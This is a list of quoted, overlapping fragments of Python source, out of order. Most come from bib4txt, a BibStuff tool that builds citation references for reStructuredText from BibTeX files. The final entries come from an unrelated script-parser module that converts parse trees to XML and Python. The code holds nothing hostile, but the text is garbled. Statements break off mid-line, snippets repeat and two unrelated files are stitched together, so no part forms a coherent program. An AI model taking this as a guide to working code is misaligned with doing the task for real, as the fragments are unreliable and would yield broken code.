"open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else:",
"bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does",
"- Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you",
"reference is a comma # CITATION_SEP = ',' # set in styles/shared.py def",
"################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() !=",
"of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME>",
"without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import",
"= sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage:",
"accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if",
"the reference list is added to the end of the file. A slight",
"bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python",
"might sort entries on citation_rank. \"\"\" #set the citation manager citekeys to all",
"citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the",
"\"\"\"ABORTED because output file %s already exists: Use -n option to nuke (overwrite)",
"importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse",
"\" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a",
"= ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported",
"the reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted. E.g.,",
"The source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly:",
"bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set",
"parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor",
"help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by",
"bib4txt_logger.warn(\"use the -f option to pass a style by filename\") stylename = os.path.splitext(stylename)[0]",
"import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i",
"style\"%stylename workaround = {} #work around Python 2 exec vs Python 3 exec",
"as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout) if args.outfile:",
"file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher -",
"cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is",
"to be used in the References section of your documents. :author: <NAME> :date:",
"\"\"\" Creates formatted references for a text document. Uuseful for reStructuredText documents. Interacts",
".bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib",
"import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run",
"scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the",
"FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\",",
"be recognized by bib4txt. - Comma separted multiple keys are permitted in a",
"default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print",
"usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version',",
"by an underscore. Citation keys cannot be all digits. The source document can",
"library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies",
"in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by",
"the formatted references to be written to a separate file. You can then",
"and output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage",
"#TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec =",
"to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second:",
"files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted",
"using LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries",
"scanning reST files for citation references. - Uses SimpleParse_ to convert an EBNF_",
"str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2",
"= src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is",
"a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except",
"# read input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r',",
"\"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python",
"are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The",
"document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental",
") except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main():",
"you should have if you have this) The source text file should include",
"references substituted for the citation keys. In this case, the reference list is",
"scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar,",
"is run as a script # style # bibfile_processor # note that the",
"os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp",
"\".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name ) try: with",
"convert an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's",
"refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\",",
"except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line",
"writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED",
"IMPORTS ################################################## #import from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n')",
"#import a bibliography style based on `stylefile` command-line option #TODO: add error handling",
"file. A slight modification of the reStructuredText ``cite`` directive is currently allowed: -",
"are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be",
"some globals are set when this file is run as a script #",
"this file is run as a script # style # bibfile_processor # note",
"`stylefile` command-line option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename)",
"2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now",
"result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only:",
"does not appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as",
"making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document",
"grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file",
"\"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages;",
"exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" #",
"citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`;",
"documents. Interacts with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies:",
"src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor",
"#citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make",
"on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store",
"for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\",",
"``cite`` directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is",
"added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names:",
"not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile)",
"# create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to",
"the keys for the citations referenced - a sort-key on which to base",
"elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass",
":date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note:",
"os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS",
"in reST and will be recognized by bib4txt. - Comma separted multiple keys",
"citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation manager to",
"# (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager)",
"the cite keys. It is also associated with citation_manager which holds the bibliography,",
"raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest",
"ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if",
"parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\",",
"bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when",
"(by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout,",
"because output file %s already exists: Use -n option to nuke (overwrite) this",
"= make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close()",
"stylename) ) #import a bibliography style based on `stylefile` command-line option #TODO: add",
"= list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not",
"if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name",
"the end of the file. A slight modification of the reStructuredText ``cite`` directive",
"module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation manager",
"args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file %s",
"ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a",
"args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line option",
"input document. - Outputs a sorted list of citation definitions, to be used",
"args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It",
"base the sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank.",
"cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds",
"list of citation definitions, to be used in the References section of your",
"TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html ..",
"object for scanning reST files for citation references. - Uses SimpleParse_ to convert",
":note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address",
"the citations referenced - a sort-key on which to base the sorting :note:",
"citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process",
"not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py",
"dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set",
"intent is for the formatted references to be written to a separate file.",
"help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references",
"if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the",
"the citation references from the input document. - Outputs a sorted list of",
"sorted list of citation definitions, to be used in the References section of",
"style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \"",
"cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the",
"with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text",
"you have this) The source text file should include citation references in reStructuredText",
"default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\",",
"#set the citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys",
"= importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work",
"= args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1)",
"to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages;",
"``include`` directive. How it works: - Uses SimpleParse_ to convert an EBNF_ grammar",
"except TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile, mode='r')",
"main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default input and",
"- BibStuff (which you should have if you have this) The source text",
"a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile],",
"= sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE",
"bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff",
"ImportError: #hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir",
"references to be written to a separate file. You can then include this",
"citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing #",
"referenced - a sort-key on which to base the sorting :note: Sorting is",
"INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print",
"an underscore. Citation keys cannot be all digits. The source document can be",
"is a comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string,",
"option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use",
"sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string",
"\"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile,",
"if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file %s already",
"``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the formatted references",
"citations referenced - a sort-key on which to base the sorting :note: Sorting",
"bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib",
"entries on citation_rank. \"\"\" #set the citation manager citekeys to all found keys",
"reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\")",
"digits. The source document can be output with formatted citation references substituted for",
"on which to base the sorting :note: Sorting is style dependent---e.g., might sort",
"references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO)",
"the entire document, if desired if not citations_only: result = cite_processor.__repr__() + result",
"(default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python",
"FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib)",
"(overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile =",
"version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\",",
"__needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os,",
"help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite",
"in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is",
"an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.)",
"citation key enclosed in brackets, followed by an underscore. Citation keys cannot be",
"written to a separate file. You can then include this in your reST",
"separate file. You can then include this in your reST document with an",
"e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the formatted",
"bibfile_processor # note that the standard separator for multiple keys in one citation",
"bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if",
"= bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input",
"imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to",
"LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!)",
"citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into an object",
"dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note:",
"\"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\",",
"nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level)",
"',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style",
"databases found.\") sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile",
"separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not*",
"References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006",
"keys for the citations referenced - a sort-key on which to base the",
"A slight modification of the reStructuredText ``cite`` directive is currently allowed: - Most",
"for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to",
"-h for help. \"\"\" #set default input and output _infile = sys.stdin _outfile",
"cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ ==",
"convert an EBNF_ grammar into an object for scanning reST files for citation",
"os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists:",
"bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only",
"bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r')",
"be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() )",
"'\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\"",
"to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename =",
"recognized by bib4txt. - Comma separted multiple keys are permitted in a cite:",
"desired if not citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds",
"FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to",
"args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not",
"default input and output _infile = sys.stdin _outfile = sys.stdout from argparse import",
"should have if you have this) The source text file should include citation",
"supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6",
"a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\",",
"process cites during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create",
"allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in",
"a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') #",
"cite keys. It is also associated with citation_manager which holds the bibliography, so",
"{} #work around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround)",
"the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor,",
"all digits. The source document can be output with formatted citation references substituted",
"The intent is for the formatted references to be written to a separate",
"processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the",
"3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\"",
"to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read()"
] |
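The shingles in the list above describe how bib4txt works: it scans reStructuredText for citation references such as ``[Schwilk+Isaac:2006]_`` (and comma-separated multi-key cites like ``[Schwilk1999,Isaac2000]_``) and emits a sorted list of citation definitions. Below is a minimal sketch of the scanning step only. The real tool builds a SimpleParse parser from an EBNF grammar, so the ``CITE_RE`` pattern and the ``find_citekeys`` helper are illustrative assumptions made here, not part of BibStuff.

import re

# A citation reference is a key in brackets followed by an underscore.
# Keys may not be all digits; a comma separates multiple keys in one cite.
# (Both rules are stated in the bib4txt fragments above.)
CITE_RE = re.compile(r"\[([^\[\]]+)\]_")

def find_citekeys(src):
    """Return the ordered, de-duplicated citation keys found in src."""
    keys = []
    for match in CITE_RE.finditer(src):
        for key in match.group(1).split(","):  # comma-separated multi-keys
            key = key.strip()
            if key and not key.isdigit() and key not in keys:
                keys.append(key)
    return keys

print(find_citekeys("See [Schwilk+Isaac:2006]_ and [Schwilk1999,Isaac2000]_."))
# -> ['Schwilk+Isaac:2006', 'Schwilk1999', 'Isaac2000']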
[
"adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if",
"options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \" % (bname,",
"ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) ==",
"class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True",
"source.xml class Module(object): def __init__(self, name, path): self.name = name self.path = path",
"qsatype for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if",
"def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class",
"lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\",",
"options.topython: from .pytnyzer import pythonize import io if options.cache: args = [x for",
"classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break",
"= [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags",
"pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {}",
"self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return",
"self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn:",
"is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem",
"os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod =",
"\".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" %",
"= ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject):",
"encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir",
"fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in",
"return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem)",
"if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \" %",
"class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags",
"sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname,",
"1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout",
"or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return",
"text = stream.getvalue() if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s:",
"io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error",
"len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else:",
"return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if",
"except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose:",
"listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self,",
"= ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: #",
"flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s \\n\" %",
"@classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True #",
"class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags",
"abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if",
"1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"]",
"polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0]",
"['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if",
"nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent)",
". .\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for",
"treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn",
"class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags =",
"% (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname",
"set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags",
"stream.getvalue() if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \" %",
"= \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags =",
